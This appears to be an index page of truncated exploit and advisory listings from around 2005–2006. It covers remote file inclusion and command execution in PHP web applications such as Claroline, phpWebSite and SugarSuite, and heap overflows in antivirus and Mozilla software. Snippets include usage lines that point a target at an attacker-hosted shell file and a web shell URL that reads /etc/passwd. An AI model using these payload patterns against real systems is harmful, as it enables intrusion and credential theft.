Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford xbefordx gmail com uso: perl own.pl host cmd-shell-url cmd-var perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: ?...

Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================== Dokeos LMS uso: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ T...

fastclicklite113.txt

Fast Click SQL Lite ----------- Fix : Contact the Vendor =========================================================== Aria Security Research Http://www.aria-security.net...

CoolMenus 4.0 - &#039;index.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/17738/info CoolMenus is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...

phpWebSite 0.10.2 - hub_dir Remote Command Execution

phpWebSite 0.10.2 - hubdir Remote Command Execution !/usr/bin/php -q -d shortopentag=on arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if $argc 0 include$hubdir . 'conf/config.php'...

phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit

Exploit for unknown platform in category web applications ================================================================ phpWebSite arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: email protected\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; if...

phpWebSite &lt;= 0.10.2 (hub_dir) Remote Commands Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "PHPWebSite = 0.10.2 remote cmmnds xctn\r\n"; echo "- arbitrary local inclusion, works with magicquotesgpc = Off\r\n"; echo "by rgod, mail: [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; i...

[Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow &#40;not default configuration&#41;

Overflow.pl Security Advisory 5 Clam AntiVirus Win32-UPX Heap Overflow not default configuration Vendor: Clam AntiVirus Affected version: Prior to 0.88.1 Vendor status: Fixed version released 0.88.1 Author: Damian Put [email protected] URL: http://www.overflow.pl/adv/clamavupxinteger.txt Date:...

phpkit_161r2_incl_xpl.txt

---------- PHPKit = v.1.6.1 release 2 remote code execution ------------------- software: site: www.phpkit.de description: a Content Management / homepage / community building software written in PHP language --------------------------------------------------------------------------------...

DocMGR &lt;= 0.54.2 arbitrary remote inclusion

--------------- DocMGR = 0.54.2 arbitrary remote inclusion -------------------- software: site: http://www.docmgr.org/ description: "DocMGR is a complete, web-based Document Management System DMS. It allows for the storage of any file type, and supports full-text indexing of the most popular...

EGS Enterprise Groupware System 1.0 rc4 remote commands execution &amp; FlySpray 0.9.7 remote commands execution

--------EGS Enterprise Groupware System 1.0 rc4 possibly prior versions------- remote code execution -------------------------------------------------------------------------------- software: site: http://egs.sourceforge.net/ description: "EGS is an Open Source business system released under the...

linpha_10_local.txt

------------- Linpha = 1.0 multiple arbitrary local inclusion ----------------- software: site: http://linpha.sourceforge.net/nuke/ description: " LinPHA is an easy to use, multilingual, flexible photo / image archive / album / gallery written in PHP. It uses a SQL database to store information...

[Full-disclosure] Symantec Antivirus Library Remote Heap Overflows

Date December 20, 2005 Vulnerability The Symantec Antivirus Library provides file format support for virus analysis. During decompression of RAR files Symantec is vulnerable to multiple heap overflows allowing attackers complete control of the systems being protected. These vulnerabilities can be...

sugar_suite_40beta.txt

SugarSuite Open Source "; fclose$fp; ? note: the file can have any extension, but not .php or any executable, it must be readable from a browser... now you can launch commands on target system: http://target/pathtosugar/suntzu.php?cmd=cat%20/etc/passwd this is my proof of concept exploit tool: ?p...

SimpleBBS &lt;= v1.1 remote commands execution in c by: unitedasia security crew

SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList$REQUEST'module'; requireonce$beanFiles$bean; ... if registerglobals on & allowurlfopen on in php.ini, remote code...

SugarSuite Open Source &lt;= 4.0beta Remote code execution

SugarSuite Open Source = 4.0beta Remote code execution software: site: http://www.sugarcrm.com/crm/ i vulnerable code in acceptDecline.php at lines 81-82 ... $bean = $beanList$REQUEST'module'; requireonce$beanFiles$bean; ... if registerglobals on & allowurlfopen on in php.ini, remote code...

atutor151pl2.txt

ATutor 1.5.1pl2 SQL Injection / Remote commands execution software: site: http://www.atutor.ca/ description : "ATutor is an Open Source Web-based Learning Content Management System LCMS designed with accessibility and adaptability in mind." if magicquotesgpc off - SQL INJECTION vulnerable code in...

wagora420_xpl.txt

W-agora 4.2.0 Remote code execution / cross site scripting poc exploit software: site: http://w-agora.net/en/index.php description: "W-Agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on you...

mylittle15_16b.txt

My Little Forum 1.5 / 1.6beta SQL Injection software: site: http://www.mylittlehomepage.net/mylittleforum software: "A simple web-forum that supports classical thread view message tree as well as messagebord view to display the messages. Requires PHP 4.1 and a MySQL database." 1 look at the...

Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)

No description provided by source. HTMLSCRIPT / SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. FireFox optimized iSY iS; .sS Exploit for IDN host name heap buffer overrun in .SSSSSSS .sS Mozilla browsers FireFox, Mozilla and Netscape iS; .sS Copyright C 2003-2005 by Berend-Jan Wever. .SS...